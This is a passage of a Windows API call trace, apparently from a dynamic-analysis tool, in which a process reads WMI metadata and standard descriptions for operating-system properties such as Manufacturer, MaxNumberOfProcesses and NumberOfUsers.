	[0111.249] IWbemClassObject:Get (in: This=0x2ad2069d9c0, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Manufacturer property indicates the name of the operating system manufacturer.  For Win32 systems this value will be Microsoft Corporation.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.250] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.250] lstrlenA (lpString="") returned 0
	[0111.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c1f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.250] SysStringLen (param_1="The Manufacturer property indicates the name of the operating system manufacturer.  For Win32 systems this value will be Microsoft Corporation.") returned 0x8f
	[0111.250] SysStringLen (param_1="") returned 0x0
	[0111.250] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.251] IWbemClassObject:Get (in: This=0x2ad2069d9c0, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.251] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.251] SysStringLen (param_1="Manufacturer") returned 0xc
	[0111.251] SysStringLen (param_1="Description") returned 0xb
	[0111.251] SysStringLen (param_1="Manufacturer") returned 0xc
	[0111.251] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.251] SysStringLen (param_1="Manufacturer") returned 0xc
	[0111.251] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0111.251] SysStringLen (param_1="Manufacturer") returned 0xc
	[0111.251] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.251] SysStringLen (param_1="Manufacturer") returned 0xc
	[0111.251] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0111.251] SysStringLen (param_1="Manufacturer") returned 0xc
	[0111.251] SysStringLen (param_1="Locale") returned 0x6
	[0111.251] SysStringLen (param_1="Locale") returned 0x6
	[0111.251] SysStringLen (param_1="Manufacturer") returned 0xc
	[0111.252] IUnknown:Release (This=0x2ad2069d9c0) returned 0x1
	[0111.252] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.252] IWbemClassObject:Get (in: This=0x2ad2069d710, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b178, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxNumberOfProcesses", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.252] IWbemClassObject:Get (in: This=0x2ad2069d710, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b2b8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxNumberOfProcesses", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.253] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.253] IWbemClassObject:Get (in: This=0x2ad2069d710, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Maximum number of process contexts the operating system can support. If there is no fixed maximum, the value should be 0. On systems that have a fixed maximum, this object can help diagnose failures that occur when the maximum is reached. If unknown, enter -1.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.254] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.254] lstrlenA (lpString="") returned 0
	[0111.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c220, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.254] SysStringLen (param_1="Maximum number of process contexts the operating system can support. If there is no fixed maximum, the value should be 0. On systems that have a fixed maximum, this object can help diagnose failures that occur when the maximum is reached. If unknown, enter -1.") returned 0x104
	[0111.254] SysStringLen (param_1="") returned 0x0
	[0111.254] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.255] IWbemClassObject:Get (in: This=0x2ad2069d710, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.255] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.255] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.255] SysStringLen (param_1="Description") returned 0xb
	[0111.255] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.255] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.255] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.255] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0111.255] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.255] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.255] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.255] SysStringLen (param_1="Locale") returned 0x6
	[0111.255] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.255] SysStringLen (param_1="Manufacturer") returned 0xc
	[0111.255] SysStringLen (param_1="Manufacturer") returned 0xc
	[0111.255] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.256] IUnknown:Release (This=0x2ad2069d710) returned 0x1
	[0111.256] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.256] IWbemClassObject:Get (in: This=0x2ad2069e1d0, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad205f1f28, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxProcessMemorySize", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.256] IWbemClassObject:Get (in: This=0x2ad2069e1d0, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ada48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxProcessMemorySize", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.257] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.257] IWbemClassObject:Get (in: This=0x2ad2069e1d0, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Maximum number of kilobytes of memory that can be allocated to a process. For operating systems with no virtual memory, this value is typically equal to the total amount of physical memory minus memory used by the BIOS and OS. For some operating systems, this value may be infinity - in which case, 0 should be entered. In other cases, this value could be a constant - for example, 2G or 4G.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.257] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.258] lstrlenA (lpString="") returned 0
	[0111.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c100, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.258] SysStringLen (param_1="Maximum number of kilobytes of memory that can be allocated to a process. For operating systems with no virtual memory, this value is typically equal to the total amount of physical memory minus memory used by the BIOS and OS. For some operating systems, this value may be infinity - in which case, 0 should be entered. In other cases, this value could be a constant - for example, 2G or 4G.") returned 0x187
	[0111.258] SysStringLen (param_1="") returned 0x0
	[0111.259] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.259] IWbemClassObject:Get (in: This=0x2ad2069e1d0, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.259] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.259] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0111.259] SysStringLen (param_1="Description") returned 0xb
	[0111.259] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0111.259] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.259] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0111.259] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.259] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0111.259] SysStringLen (param_1="Locale") returned 0x6
	[0111.259] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0111.260] SysStringLen (param_1="Manufacturer") returned 0xc
	[0111.260] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0111.260] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.260] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.260] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0111.260] IUnknown:Release (This=0x2ad2069e1d0) returned 0x1
	[0111.260] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.260] IWbemClassObject:Get (in: This=0x2ad2069d460, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ada48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.260] IWbemClassObject:Get (in: This=0x2ad2069d460, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ae218, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.261] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.261] IWbemClassObject:Get (in: This=0x2ad2069d460, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The inherited Name property serves as key of an operating system instance within a computer system.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.261] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.261] lstrlenA (lpString="") returned 0
	[0111.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c220, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.262] SysStringLen (param_1="The inherited Name property serves as key of an operating system instance within a computer system.") returned 0x63
	[0111.262] SysStringLen (param_1="") returned 0x0
	[0111.262] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.262] IWbemClassObject:Get (in: This=0x2ad2069d460, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.262] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.263] SysStringLen (param_1="Name") returned 0x4
	[0111.263] SysStringLen (param_1="Description") returned 0xb
	[0111.263] SysStringLen (param_1="Name") returned 0x4
	[0111.263] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.263] SysStringLen (param_1="Name") returned 0x4
	[0111.263] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.263] SysStringLen (param_1="Name") returned 0x4
	[0111.263] SysStringLen (param_1="Locale") returned 0x6
	[0111.263] SysStringLen (param_1="Name") returned 0x4
	[0111.263] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.263] SysStringLen (param_1="Name") returned 0x4
	[0111.263] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0111.263] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0111.263] SysStringLen (param_1="Name") returned 0x4
	[0111.263] IUnknown:Release (This=0x2ad2069d460) returned 0x1
	[0111.263] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.264] IWbemClassObject:Get (in: This=0x2ad2069e480, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ac7c8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfLicensedUsers", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.264] IWbemClassObject:Get (in: This=0x2ad2069e480, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206aca38, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfLicensedUsers", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.264] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.264] IWbemClassObject:Get (in: This=0x2ad2069e480, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Number of user licenses for the operating system. If unlimited, enter 0. If unknown, enter -1.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.265] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.265] lstrlenA (lpString="") returned 0
	[0111.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c200, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.265] SysStringLen (param_1="Number of user licenses for the operating system. If unlimited, enter 0. If unknown, enter -1.") returned 0x5e
	[0111.265] SysStringLen (param_1="") returned 0x0
	[0111.265] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.266] IWbemClassObject:Get (in: This=0x2ad2069e480, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.266] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.266] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0111.266] SysStringLen (param_1="Description") returned 0xb
	[0111.266] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0111.266] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.266] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0111.266] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.266] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0111.266] SysStringLen (param_1="Locale") returned 0x6
	[0111.266] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0111.266] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.266] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0111.266] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0111.266] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0111.266] SysStringLen (param_1="Name") returned 0x4
	[0111.266] SysStringLen (param_1="Name") returned 0x4
	[0111.266] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0111.267] IUnknown:Release (This=0x2ad2069e480) returned 0x1
	[0111.267] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.267] IWbemClassObject:Get (in: This=0x2ad2069dc70, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ae218, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfProcesses", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.267] IWbemClassObject:Get (in: This=0x2ad2069dc70, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ad9a8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfProcesses", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.269] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.269] IWbemClassObject:Get (in: This=0x2ad2069dc70, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Number of process contexts currently loaded or running on the operating system.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.269] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.270] lstrlenA (lpString="") returned 0
	[0111.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c230, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.270] SysStringLen (param_1="Number of process contexts currently loaded or running on the operating system.") returned 0x4f
	[0111.270] SysStringLen (param_1="") returned 0x0
	[0111.270] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.270] IWbemClassObject:Get (in: This=0x2ad2069dc70, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.271] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.279] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.279] SysStringLen (param_1="Description") returned 0xb
	[0111.279] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.279] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.279] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.279] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.279] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.279] SysStringLen (param_1="Locale") returned 0x6
	[0111.279] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.279] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.279] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.279] SysStringLen (param_1="Name") returned 0x4
	[0111.279] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.279] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0111.279] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0111.279] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.280] IUnknown:Release (This=0x2ad2069dc70) returned 0x1
	[0111.280] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.280] IWbemClassObject:Get (in: This=0x2ad2069b6d0, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b2b8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfUsers", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.280] IWbemClassObject:Get (in: This=0x2ad2069b6d0, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ae218, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfUsers", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.280] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.281] IWbemClassObject:Get (in: This=0x2ad2069b6d0, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Number of user sessions for which the operating system is currently storing state information", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.281] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.281] lstrlenA (lpString="") returned 0
	[0111.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c1f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.282] SysStringLen (param_1="Number of user sessions for which the operating system is currently storing state information") returned 0x5d
	[0111.283] SysStringLen (param_1="") returned 0x0
	[0111.283] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.283] IWbemClassObject:Get (in: This=0x2ad2069b6d0, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.284] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.284] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0111.285] SysStringLen (param_1="Description") returned 0xb
	[0111.285] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0111.285] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.285] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0111.285] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.285] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0111.285] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0111.285] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0111.285] SysStringLen (param_1="Name") returned 0x4
	[0111.285] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0111.285] SysStringLen (param_1="NumberOfLicensedUsers") returned 0x15
	[0111.285] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0111.285] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.285] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0111.285] SysStringLen (param_1="NumberOfUsers") returned 0xd
	[0111.286] IUnknown:Release (This=0x2ad2069b6d0) returned 0x1
	[0111.286] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.286] IWbemClassObject:Get (in: This=0x2ad2069cf00, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ae218, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Organization", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.286] IWbemClassObject:Get (in: This=0x2ad2069cf00, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b538, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Organization", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.287] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.287] IWbemClassObject:Get (in: This=0x2ad2069cf00, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Organization property indicates the the registered user's (of the operating system) company name./nExample: Microsoft Corporation.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.287] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.287] lstrlenA (lpString="") returned 0
	[0111.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c200, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.288] SysStringLen (param_1="The Organization property indicates the the registered user's (of the operating system) company name./nExample: Microsoft Corporation.") returned 0x86
	[0111.288] SysStringLen (param_1="") returned 0x0
	[0111.288] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
